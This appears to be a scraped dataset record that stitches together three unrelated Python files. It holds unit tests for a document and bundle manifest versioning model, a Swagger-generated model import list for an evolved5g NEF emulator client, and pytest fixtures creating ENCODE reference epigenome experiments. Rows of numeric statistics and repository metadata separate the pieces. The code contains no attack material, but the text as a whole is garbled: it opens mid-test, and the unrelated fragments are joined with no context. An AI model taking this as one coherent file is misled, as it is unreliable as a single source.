oldest["data"], "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml"
)
def test_version_only_shows_newest_assets(self):
document = self.make_one()
oldest = document.version(0)
expected = {
"data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
"assets": {
"0034-8910-rsp-48-2-0275-gf01.gif": "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif"
},
"timestamp": "2018-08-05T23:02:29.392990Z",
}
self.assertEqual(oldest, expected)
def test_new_version_automaticaly_references_latest_known_assets(self):
manifest = {
"id": "0034-8910-rsp-48-2-0275",
"versions": [
{
"data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
"assets": {
"0034-8910-rsp-48-2-0275-gf01.gif": [
(
"2018-08-05T23:03:44.971230Z",
"/rawfiles/8e644999a8fa4/0034-8910-rsp-48-2-0275-gf01.gif",
),
(
"2018-08-05T23:03:49.971250Z",
"/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
),
]
},
}
],
}
document = domain.Document(manifest=manifest)
document.new_version(
"/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml",
assets_getter=lambda data_url, timeout: (
None,
[("0034-8910-rsp-48-2-0275-gf01.gif", None)],
),
)
latest = document.version()
self.assertEqual(
latest["assets"]["0034-8910-rsp-48-2-0275-gf01.gif"],
"/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif",
)
def test_version_at_later_time(self):
"""
No manifesto `SAMPLE_MANIFEST`, a versão mais recente possui foi
produzida nos seguintes instantes: a) dados em 2018-08-05 23:30:29.392990
e b) ativo digital em 2018-08-05 23:30:29.392995.
"""
document = self.make_one()
target = document.version_at("2018-12-31")
expected = {
"data": "/rawfiles/2d3ad9c6bc656/0034-8910-rsp-48-2-0275.xml",
"assets": {
"0034-8910-rsp-48-2-0275-gf01.gif": "/rawfiles/bf139b9aa3066/0034-8910-rsp-48-2-0275-gf01.gif"
},
"timestamp": "2018-08-05T23:30:29.392990Z",
}
self.assertEqual(target, expected)
def test_version_at_given_time(self):
document = self.make_one()
target = document.version_at("2018-08-05T23:04:00Z")
expected = {
"data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
"assets": {
"0034-8910-rsp-48-2-0275-gf01.gif": "/rawfiles/8e644999a8fa4/0034-8910-rsp-48-2-0275-gf01.gif"
},
"timestamp": "2018-08-05T23:02:29.392990Z",
}
self.assertEqual(target, expected)
def test_version_at_time_between_data_and_asset_registration(self):
document = self.make_one()
target = document.version_at("2018-08-05T23:03:43Z")
expected = {
"data": "/rawfiles/7ca9f9b2687cb/0034-8910-rsp-48-2-0275.xml",
"assets": {"0034-8910-rsp-48-2-0275-gf01.gif": ""},
"timestamp": "2018-08-05T23:02:29.392990Z",
}
self.assertEqual(target, expected)
def test_version_at_time_prior_to_data_registration(self):
document = self.make_one()
self.assertRaises(ValueError, lambda: document.version_at("2018-07-01"))
def test_version_at_non_UCT_time_raises_exception(self):
document = self.make_one()
self.assertRaises(
ValueError, lambda: document.version_at("2018-08-05 23:03:44")
)
class BundleManifestTest(UnittestMixin, unittest.TestCase):
def test_new(self):
fake_date = fake_utcnow()
expected = {
"id": "0034-8910-rsp-48-2",
"created": fake_date,
"updated": fake_date,
"items": [],
"metadata": {},
}
self.assertEqual(new_bundle("0034-8910-rsp-48-2"), expected)
def test_new_set_same_value_to_created_updated(self):
documents_bundle = domain.BundleManifest.new("0034-8910-rsp-48-2")
self.assertEqual(documents_bundle["created"], documents_bundle["updated"])
def test_set_metadata(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018", now=fake_utcnow
)
self.assertEqual(
documents_bundle["metadata"]["publication_year"], [(fake_utcnow(), "2018")]
)
def test_set_metadata_updates_last_modification_date(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018"
)
self.assertTrue(current_updated < documents_bundle["updated"])
def test_set_metadata_doesnt_overwrite_existing_values(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle,
"publication_year",
"2018",
now=lambda: "2018-08-05T22:33:49.795151Z",
)
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle,
"publication_year",
"2019",
now=lambda: "2018-08-05T22:34:07.795151Z",
)
self.assertEqual(
documents_bundle["metadata"]["publication_year"],
[
("2018-08-05T22:33:49.795151Z", "2018"),
("2018-08-05T22:34:07.795151Z", "2019"),
],
)
self.assertEqual(len(documents_bundle["metadata"]), 1)
def test_set_metadata_to_preexisting_set(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle,
"publication_year",
"2018",
now=lambda: "2018-08-05T22:33:49.795151Z",
)
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "volume", "25", now=lambda: "2018-08-05T22:34:07.795151Z"
)
self.assertEqual(
documents_bundle["metadata"]["publication_year"],
[("2018-08-05T22:33:49.795151Z", "2018")],
)
self.assertEqual(
documents_bundle["metadata"]["volume"],
[("2018-08-05T22:34:07.795151Z", "25")],
)
self.assertEqual(len(documents_bundle["metadata"]), 2)
def test_get_metadata(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018"
)
self.assertEqual(
domain.BundleManifest.get_metadata(documents_bundle, "publication_year"),
"2018",
)
def test_get_metadata_always_returns_latest(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2018"
)
documents_bundle = domain.BundleManifest.set_metadata(
documents_bundle, "publication_year", "2019"
)
self.assertEqual(
domain.BundleManifest.get_metadata(documents_bundle, "publication_year"),
"2019",
)
def test_get_metadata_defaults_to_empty_str_when_missing(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
self.assertEqual(
domain.BundleManifest.get_metadata(documents_bundle, "publication_year"), ""
)
def test_get_metadata_with_user_defined_default(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
self.assertEqual(
domain.BundleManifest.get_metadata(
documents_bundle, "publication_year", default="2019"
),
"2019",
)
def test_add_item(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0275"
)
self.assertEqual(
documents_bundle["items"][-1], "/documents/0034-8910-rsp-48-2-0275"
)
self.assertTrue(current_updated < documents_bundle["updated"])
def test_add_item_raises_exception_if_item_already_exists(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0275"
)
current_updated = documents_bundle["updated"]
current_item_len = len(documents_bundle["items"])
self._assert_raises_with_message(
exceptions.AlreadyExists,
'cannot add item "/documents/0034-8910-rsp-48-2-0275" in bundle: '
"the item already exists",
domain.BundleManifest.add_item,
documents_bundle,
"/documents/0034-8910-rsp-48-2-0275",
)
self.assertEqual(current_updated, documents_bundle["updated"])
self.assertEqual(current_item_len, len(documents_bundle["items"]))
def test_insert_item(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0775"
)
documents_bundle = domain.BundleManifest.insert_item(
documents_bundle, 0, "/documents/0034-8910-rsp-48-2-0275"
)
self.assertEqual(
documents_bundle["items"][0], "/documents/0034-8910-rsp-48-2-0275"
)
self.assertEqual(
documents_bundle["items"][1], "/documents/0034-8910-rsp-48-2-0775"
)
self.assertTrue(current_updated < documents_bundle["updated"])
def test_insert_item_raises_exception_if_item_already_exists(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0775"
)
current_updated = documents_bundle["updated"]
current_item_len = len(documents_bundle["items"])
self._assert_raises_with_message(
exceptions.AlreadyExists,
'cannot insert item "/documents/0034-8910-rsp-48-2-0775" in bundle: '
"the item already exists",
domain.BundleManifest.insert_item,
documents_bundle,
0,
"/documents/0034-8910-rsp-48-2-0775",
)
self.assertEqual(current_updated, documents_bundle["updated"])
self.assertEqual(current_item_len, len(documents_bundle["items"]))
def test_insert_item_follows_python_semantics(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0475"
)
documents_bundle = domain.BundleManifest.insert_item(
documents_bundle, -10, "/documents/0034-8910-rsp-48-2-0275"
)
self.assertEqual(
documents_bundle["items"][0], "/documents/0034-8910-rsp-48-2-0275"
)
documents_bundle = domain.BundleManifest.insert_item(
documents_bundle, 10, "/documents/0034-8910-rsp-48-2-0975"
)
self.assertEqual(
documents_bundle["items"][-1], "/documents/0034-8910-rsp-48-2-0975"
)
def test_remove_item(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
documents_bundle = domain.BundleManifest.add_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0475"
)
documents_bundle = domain.BundleManifest.remove_item(
documents_bundle, "/documents/0034-8910-rsp-48-2-0475"
)
self.assertNotIn(
"/documents/0034-8910-rsp-48-2-0475", documents_bundle["items"]
)
self.assertTrue(current_updated < documents_bundle["updated"])
def test_remove_item_raises_exception_if_item_does_not_exist(self):
documents_bundle = new_bundle("0034-8910-rsp-48-2")
current_updated = documents_bundle["updated"]
current_item_len = len(documents_bundle["items"])
self._assert_raises_with_message(
exceptions.DoesNotExist,
'cannot remove item "/documents/0034-8910-rsp-48-2-0775" from bundle: '
"the item does not exist",
domain.BundleManifest.remove_item,
documents_bundle,
"/documents/0034-8910-rsp-48-2-0775",
)
self.assertEqual(current_updated, documents_bundle["updated"])
self.assertEqual(current_item_len, len(documents_bundle["items"]))
class DocumentsBundleTest(UnittestMixin, unittest.TestCase):
def setUp(self):
datetime_patcher = mock.patch.object(
domain, "datetime", mock.Mock(wraps=datetime.datetime)
)
mocked_datetime = datetime_patcher.start()
mocked_datetime.utcnow.return_value = datetime.datetime(
2018, 8, 5, 22, 33, 49, 795151
)
self.addCleanup(datetime_patcher.stop)
def test_manifest_is_generated_on_init(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertTrue(isinstance(documents_bundle.manifest, dict))
def test_manifest_as_arg_on_init(self):
existing_manifest = new_bundle("0034-8910-rsp-48-2")
documents_bundle = domain.DocumentsBundle(manifest=existing_manifest)
self.assertEqual(existing_manifest, documents_bundle.manifest)
def test_manifest_schema_is_not_validated_on_init(self):
existing_manifest = {"versions": []}
documents_bundle = domain.DocumentsBundle(manifest=existing_manifest)
self.assertEqual(existing_manifest, documents_bundle.manifest)
def test_id_returns_id(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertEqual(documents_bundle.id(), "0034-8910-rsp-48-2")
def test_publication_year_is_empty_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertEqual(documents_bundle.publication_year, "")
def test_set_publication_year(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.publication_year = "2018"
self.assertEqual(documents_bundle.publication_year, "2018")
self.assertEqual(
documents_bundle.manifest["metadata"]["publication_year"],
[("2018-08-05T22:33:49.795151Z", "2018")],
)
def test_set_publication_year_convert_to_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.publication_year = 2018
self.assertEqual(documents_bundle.publication_year, "2018")
def test_set_publication_year_validates_four_digits_year(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self._assert_raises_with_message(
ValueError,
"cannot set publication_year with value " '"18": the value is not valid',
setattr,
documents_bundle,
"publication_year",
18,
)
def test_volume_is_empty_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertEqual(documents_bundle.volume, "")
def test_set_volume(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.volume = "25"
self.assertEqual(documents_bundle.volume, "25")
self.assertEqual(
documents_bundle.manifest["metadata"]["volume"],
[("2018-08-05T22:33:49.795151Z", "25")],
)
def test_set_volume_convert_to_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.volume = 25
self.assertEqual(documents_bundle.volume, "25")
def test_set_volume_content_is_not_validated(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.volume = "25.A"
self.assertEqual(documents_bundle.volume, "25.A")
def test_number_is_empty_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertEqual(documents_bundle.number, "")
def test_set_number(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.number = "3"
self.assertEqual(documents_bundle.number, "3")
self.assertEqual(
documents_bundle.manifest["metadata"]["number"],
[("2018-08-05T22:33:49.795151Z", "3")],
)
def test_set_number_convert_to_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.number = 3
self.assertEqual(documents_bundle.number, "3")
def test_set_number_content_is_not_validated(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.number = "3.A"
self.assertEqual(documents_bundle.number, "3.A")
def test_supplement_is_empty_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertEqual(documents_bundle.supplement, "")
def test_set_supplement(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.supplement = "3"
self.assertEqual(documents_bundle.supplement, "3")
self.assertEqual(
documents_bundle.manifest["metadata"]["supplement"],
[("2018-08-05T22:33:49.795151Z", "3")],
)
def test_set_supplement_convert_to_str(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.supplement = 3
self.assertEqual(documents_bundle.supplement, "3")
def test_add_document(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
self.assertIn(
"/documents/0034-8910-rsp-48-2-0275", documents_bundle.manifest["items"]
)
def test_add_document_raises_exception_if_item_already_exists(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
self._assert_raises_with_message(
exceptions.AlreadyExists,
'cannot add item "/documents/0034-8910-rsp-48-2-0275" in bundle: '
"the item already exists",
documents_bundle.add_document,
"/documents/0034-8910-rsp-48-2-0275",
)
def test_documents_returns_empty_list(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
self.assertEqual(documents_bundle.documents, [])
def test_documents_returns_added_documents_list(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0276")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0277")
self.assertEqual(
documents_bundle.documents,
[
"/documents/0034-8910-rsp-48-2-0275",
"/documents/0034-8910-rsp-48-2-0276",
"/documents/0034-8910-rsp-48-2-0277",
],
)
def test_remove_document(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0276")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0277")
documents_bundle.remove_document("/documents/0034-8910-rsp-48-2-0275")
self.assertNotIn(
"/documents/0034-8910-rsp-48-2-0275", documents_bundle.manifest["items"]
)
self.assertEqual(2, len(documents_bundle.manifest["items"]))
def test_remove_document_raises_exception_if_item_does_not_exist(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0276")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0277")
self._assert_raises_with_message(
exceptions.DoesNotExist,
'cannot remove item "/documents/0034-8910-rsp-48-2-0275" from bundle: '
"the item does not exist",
documents_bundle.remove_document,
"/documents/0034-8910-rsp-48-2-0275",
)
def test_insert_document(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0276")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0277")
documents_bundle.insert_document(1, "/documents/0034-8910-rsp-48-2-0271")
self.assertEqual(
"/documents/0034-8910-rsp-48-2-0271", documents_bundle.manifest["items"][1]
)
self.assertEqual(4, len(documents_bundle.manifest["items"]))
def test_insert_document_raises_exception_if_item_already_exists(self):
documents_bundle = domain.DocumentsBundle(id="0034-8910-rsp-48-2")
documents_bundle.add_document("/documents/0034-8910-rsp-48-2-0275")
self._assert_raises_with_message(
exceptions.AlreadyExists,
'cannot insert item "/documents/0034-8910-rsp-48-2-0275" in bundle: '
"the item already exists",
documents_bundle.insert_document,
1,
"/documents/0034-8910-rsp-48-2-0275",
)
class JournalTest(UnittestMixin, unittest.TestCase):
def setUp(self):
datetime_patcher = mock.patch.object(
domain, "datetime", mock.Mock(wraps=datetime.datetime)
)
mocked_datetime = datetime_patcher.start()
mocked_datetime.utcnow.return_value = datetime.datetime(
2018, 8, 5, 22, 33, 49, 795151
)
self.addCleanup(datetime_patcher.stop)
def test_manifest_is_generated_on_init(self):
journal = domain.Journal(id="0034-8910-rsp-48-2")
self.assertTrue(isinstance(journal.manifest, dict))
def test_manifest_as_arg_on_init(self):
existing_manifest = new_bundle("0034-8910-rsp-48-2")
journal = domain.Journal(manifest=existing_manifest)
self.assertEqual(existing_manifest, journal.manifest)
def test_manifest_schema_is_not_validated_on_init(self):
existing_manifest = {"versions": []}
journal = domain.Journal(manifest=existing_manifest)
self.assertEqual(existing_manifest, journal.manifest)
def test_id_returns_id(self):
journal = domain.Journal(id="0034-8910-rsp-48-2")
self.assertEqual(journal.id(), "0034-8910-rsp-48-2")
def test_set_mission(self):
documents_bundle = domain.Journal(id="0034-8910-rsp-48-2")
documents_bundle.mission = {
"pt": "Publicar trabalhos científicos originais sobre a Amazonia.",
"es": "Publicar trabajos científicos originales sobre Amazonia.",
"en": "To publish original scientific papers about Amazonia.",
}
self.assertEqual(
documents_bundle.mission,
{
"pt": "Publicar trabalhos científicos originais sobre a Amazonia.",
"es": "Publicar trabajos científicos originales sobre Amazonia.",
"en": "To publish original scientific papers about Amazonia.",
},
)
self.assertEqual(
documents_bundle.manifest["metadata"]["mission"][-1],
(
"2018-08-05T22:33:49.795151Z",
{
"pt": "Publicar trabalhos científicos originais sobre a Amazonia.",
"es": "Publicar trabajos científicos originales sobre Amazonia.",
"en": "To publish original scientific papers about Amazonia.",
},
),
)
def test_set_mission_content_is_not_validated(self):
documents_bundle = domain.Journal(id="0034-8910-rsp-48-2")
self._assert_raises_with_message(
ValueError,
"cannot set mission with value "
'"mission-invalid": the value is not valid',
setattr,
documents_bundle,
"mission",
"mission-invalid",
)
| 41.18042
| 110
| 0.627938
| 3,361
| 29,444
| 5.286522
| 0.081821
| 0.157868
| 0.084815
| 0.100236
| 0.87348
| 0.859973
| 0.82052
| 0.796826
| 0.767729
| 0.736549
| 0
| 0.127452
| 0.250408
| 29,444
| 714
| 111
| 41.238095
| 0.677586
| 0.006385
| 0
| 0.527157
| 0
| 0.009585
| 0.235214
| 0.133523
| 0
| 0
| 0
| 0
| 0.145367
| 1
| 0.113419
| false
| 0
| 0.009585
| 0.001597
| 0.134185
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
334cb3d830996f9637c4a2fb5417a9a4efc8e75b
| 4,456
|
py
|
Python
|
evolved5g/swagger_client/models/__init__.py
|
EVOLVED-5G/SDK-CLI
|
0f289c7b21c14c3e349164d21cc78d9b6af0a237
|
[
"Apache-2.0"
] | 3
|
2021-10-19T14:37:14.000Z
|
2021-11-01T10:43:33.000Z
|
evolved5g/swagger_client/models/__init__.py
|
skolome/evolved5g_cli
|
b202a878befe22b8dda66ee05610408777f4f006
|
[
"Apache-2.0"
] | 14
|
2021-11-02T10:30:56.000Z
|
2022-03-10T11:30:59.000Z
|
evolved5g/swagger_client/models/__init__.py
|
skolome/evolved5g_cli
|
b202a878befe22b8dda66ee05610408777f4f006
|
[
"Apache-2.0"
] | 1
|
2021-11-16T16:20:31.000Z
|
2021-11-16T16:20:31.000Z
|
# coding: utf-8
# flake8: noqa
"""
NEF_Emulator
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 0.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
# import models into model package
from evolved5g.swagger_client.models.accumulated_usage import AccumulatedUsage
from evolved5g.swagger_client.models.all_of_ue_create_speed import AllOfUECreateSpeed
from evolved5g.swagger_client.models.all_of_ue_speed import AllOfUESpeed
from evolved5g.swagger_client.models.all_of_ue_update_speed import AllOfUEUpdateSpeed
from evolved5g.swagger_client.models.all_of_u_es_speed import AllOfUEsSpeed
from evolved5g.swagger_client.models.all_of_user_plane_event_report_event import AllOfUserPlaneEventReportEvent
from evolved5g.swagger_client.models.as_session_with_qo_s_subscription import AsSessionWithQoSSubscription
from evolved5g.swagger_client.models.as_session_with_qo_s_subscription_create import AsSessionWithQoSSubscriptionCreate
from evolved5g.swagger_client.models.body_create_user_open_api_v1_users_open_post import BodyCreateUserOpenApiV1UsersOpenPost
from evolved5g.swagger_client.models.body_login_access_token_api_v1_login_access_token_post import BodyLoginAccessTokenApiV1LoginAccessTokenPost
from evolved5g.swagger_client.models.body_reset_password_api_v1_reset_password_post import BodyResetPasswordApiV1ResetPasswordPost
from evolved5g.swagger_client.models.body_update_user_me_api_v1_users_me_put import BodyUpdateUserMeApiV1UsersMePut
from evolved5g.swagger_client.models.cell import Cell
from evolved5g.swagger_client.models.cell_create import CellCreate
from evolved5g.swagger_client.models.cell_update import CellUpdate
from evolved5g.swagger_client.models.gnb import GNB
from evolved5g.swagger_client.models.gnb_create import GNBCreate
from evolved5g.swagger_client.models.gnb_update import GNBUpdate
from evolved5g.swagger_client.models.http_validation_error import HTTPValidationError
from evolved5g.swagger_client.models.location_info import LocationInfo
from evolved5g.swagger_client.models.monitoring_event_report import MonitoringEventReport
from evolved5g.swagger_client.models.monitoring_event_report_received import MonitoringEventReportReceived
from evolved5g.swagger_client.models.monitoring_event_subscription import MonitoringEventSubscription
from evolved5g.swagger_client.models.monitoring_event_subscription_create import MonitoringEventSubscriptionCreate
from evolved5g.swagger_client.models.monitoring_notification import MonitoringNotification
from evolved5g.swagger_client.models.monitoring_type import MonitoringType
from evolved5g.swagger_client.models.msg import Msg
from evolved5g.swagger_client.models.path import Path
from evolved5g.swagger_client.models.path_create import PathCreate
from evolved5g.swagger_client.models.path_update import PathUpdate
from evolved5g.swagger_client.models.paths import Paths
from evolved5g.swagger_client.models.point import Point
from evolved5g.swagger_client.models.qo_s_monitoring_report import QoSMonitoringReport
from evolved5g.swagger_client.models.qos_monitoring_information import QosMonitoringInformation
from evolved5g.swagger_client.models.reporting_frequency import ReportingFrequency
from evolved5g.swagger_client.models.requested_qo_s_monitoring_parameters import RequestedQoSMonitoringParameters
from evolved5g.swagger_client.models.snssai import Snssai
from evolved5g.swagger_client.models.speed import Speed
from evolved5g.swagger_client.models.token import Token
from evolved5g.swagger_client.models.ue import UE
from evolved5g.swagger_client.models.ue_create import UECreate
from evolved5g.swagger_client.models.ue_update import UEUpdate
from evolved5g.swagger_client.models.u_es import UEs
from evolved5g.swagger_client.models.usage_threshold import UsageThreshold
from evolved5g.swagger_client.models.user import User
from evolved5g.swagger_client.models.user_create import UserCreate
from evolved5g.swagger_client.models.user_plane_event import UserPlaneEvent
from evolved5g.swagger_client.models.user_plane_event_report import UserPlaneEventReport
from evolved5g.swagger_client.models.user_plane_notification_data import UserPlaneNotificationData
from evolved5g.swagger_client.models.user_update import UserUpdate
from evolved5g.swagger_client.models.validation_error import ValidationError
| 65.529412
| 144
| 0.898115
| 568
| 4,456
| 6.75
| 0.230634
| 0.172926
| 0.266041
| 0.345853
| 0.525561
| 0.392019
| 0.194053
| 0.144236
| 0.031299
| 0.031299
| 0
| 0.015983
| 0.059246
| 4,456
| 67
| 145
| 66.507463
| 0.898616
| 0.063959
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.019231
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
335b8896fdf029c6a3343b87562bffeb771f09dc
| 15,571
|
py
|
Python
|
src/encoded/tests/test_audit_reference_epigenome.py
|
procha2/regulome-encoded
|
327a097ebb539d1b4770145a598de08b579234f9
|
[
"MIT"
] | null | null | null |
src/encoded/tests/test_audit_reference_epigenome.py
|
procha2/regulome-encoded
|
327a097ebb539d1b4770145a598de08b579234f9
|
[
"MIT"
] | 38
|
2019-03-22T14:11:51.000Z
|
2022-03-30T23:56:09.000Z
|
src/encoded/tests/test_audit_reference_epigenome.py
|
procha2/regulome-encoded
|
327a097ebb539d1b4770145a598de08b579234f9
|
[
"MIT"
] | 2
|
2020-10-01T11:48:07.000Z
|
2021-02-23T06:33:15.000Z
|
import pytest
@pytest.fixture
def reference_epigenome_1(testapp, lab, award):
item = {
'award': award['@id'],
'lab': lab['@id']
}
return testapp.post_json('/reference_epigenome', item).json['@graph'][0]
@pytest.fixture
def reference_experiment_RNA_seq(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'RNA-seq',
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_RRBS(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'assay_term_name': 'RRBS',
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_WGBS(testapp, lab, award, ileum):
item = {
'award': award['uuid'],
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'assay_term_name': 'whole-genome shotgun bisulfite sequencing',
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_control(testapp, lab, award, target_control, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_control['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K27me3(testapp, lab, award, target_H3K27me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'status': 'released',
'date_released': '2019-01-08',
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K27me3['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K36me3(testapp, lab, award, target_H3K36me3, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K36me3['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
@pytest.fixture
def reference_experiment_chip_seq_H3K4me1(testapp, lab, award, target_H3K4me1, ileum):
item = {
'award': award['uuid'],
'lab': lab['uuid'],
'biosample_type': 'tissue',
'biosample_term_id': 'UBERON:349829',
'status': 'released',
'date_released': '2019-01-08',
'biosample_ontology': ileum['uuid'],
'assay_term_name': 'ChIP-seq',
'target': target_H3K4me1['uuid'],
'experiment_classification': ['functional genomics assay']
}
return testapp.post_json('/experiment', item, status=201).json['@graph'][0]
